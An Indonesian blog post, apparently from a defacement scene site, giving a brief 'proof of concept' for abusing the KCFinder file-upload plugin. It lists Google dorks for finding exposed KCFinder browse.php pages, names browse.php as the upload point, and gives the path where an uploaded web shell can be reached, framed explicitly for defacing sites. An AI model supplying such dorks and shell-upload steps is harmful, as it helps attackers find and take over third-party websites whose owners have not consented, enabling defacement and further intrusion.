Deface Poc Vulnerability Kcfinder Files Upload



Welcome back, mumpung gw lagi gabut, gw share kerentanan lagi nih, proof of concept kcfinder. Sebelumnya ada yg tau kerentaan dari kcfinder?, kerentaan nya karena adanya bug di web yg mengijinkan sang attacker mengunggah file dari plugin kcfinder, jadi hampir mirip ya sama kerentaan rfm.



Dork: inurl:/kcfinder/browse.php
           inurl:/assets/kcfinder/browse.php
           inurl:/panel/kcfinder/ site:etc
           inurl:kcfinder intext:browse.php


Exploit: browse.php



Access Your Shell: site/kcfinder/upload/files/yourshell.php

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel